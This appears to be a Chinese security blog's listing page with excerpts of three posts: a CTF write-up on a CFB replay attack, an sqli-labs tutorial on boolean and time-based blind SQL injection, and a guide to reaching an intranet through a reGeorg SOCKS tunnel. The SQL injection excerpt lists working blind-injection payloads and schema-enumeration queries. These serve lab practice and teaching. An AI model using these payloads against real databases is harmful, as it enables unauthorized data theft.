CFB重放攻击

作者: 分类: CTF,Programming 时间: 2017-04-17 评论: 3条评论

http://cstc.xatu.cn/ - web300 - amdin
www.tar.gz

0x00 摸下套路

先把源码down下来,查看下大概逻辑如下:

1. index.php五个功能:home, register, login, manage, logout
2. encrypt.php实现RIJNDAEL_128(CFB)加解密
3. backup.txt存有flag.txt里存放的内容加密后的字符串
4. key.php里得到的identify和key我们没办法知道

刚看到的时候一下子想起了之前搞过的那个CBC字节反转攻击,但是细看后才发现并不是,CFB的,而且一些限制条件($md5),没办法简单的反转攻击。

看接下来实操部分之前,先了解清楚分组加密模式以及本次遇到的CFB的工作方式:分组密码工作模式 - 维基百科

阅读全文»

SQL注入之旅 : Sqli Labs Part 3 - GET盲注

作者: 分类: Sql-Injection 时间: 2017-04-11 评论: 暂无评论

这个系列基于sqli-labs,请自行下载

0x00 前言

这次是第8,9,10三个实验,布尔型和时间型盲注(Blind SQL Injection, Boolean-Based | Time-Based),布尔型的话根据查询对错页面会有变化但不回显错误,而时间型页面不回显任何错误,也就没办法判断是否对错。可以看下老外(口音很操蛋就是了)的视频:布尔型时间型,实验探究的过程挺详细的。

0x02 使用到的语句

SELECT LENGTH(USER());
SELECT IF((SELECT LENGTH(USER()))=14,1,2);
SELECT IF((ASCII(SUBSTR(USER(),1,1))= 0x72),1,2);
SELECT IF((SUBSTR(USER(),1,1)= BINARY CHAR(114)),1,2);


SELECT IF(((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=4),1,2);
SELECT IF((ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1),1,1))=ORD('e')),1,2);
SELECT 1=IF((SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1)=6,1,2);


SELECT 1=IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name=0x656d61696c73)=2,1,2);
SELECT 1=IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name=0x656d61696c73 LIMIT 0,1),1,1))=105,1,2);


SELECT SLEEP(3);
SELECT BENCHMARK(1000000,SHA(1));
SELECT IF((SELECT DATABASE())="security",SLEEP(3),null);

AND IF((SELECT DATABASE())=0x7365637572697479,SLEEP(5),1)--+
AND IF((SELECT DATABASE())=0x7365637572697479,benchmark(10000000,sha(1)),1)--+

阅读全文»

内网渗透 —— 通过代理访问内网

作者: 分类: Web,Security 时间: 2017-04-10 评论: 1条评论

0x00 场景及使用到的工具

  • 本机处于内网
  • 目标机器处于内网,只映射80端口到出口IP(外网IP)上。
  • 内网同网段下存在其他活跃主机。

使用到的工具:

0x01 准备

本机是MacOSLinux下差不多,Windows就是代理软件的选择上有差别。

因为很多场景是服务器对外的服务是Web,所以先git clone一下reGeorg,里面有包括PHPJSPASPASPX在内的tunnel,用于开启Socks反向代理。

然后安装一下Proxifier,至于如何选择,可以看一下这里Comparison_of_proxifiers

General.png

阅读全文»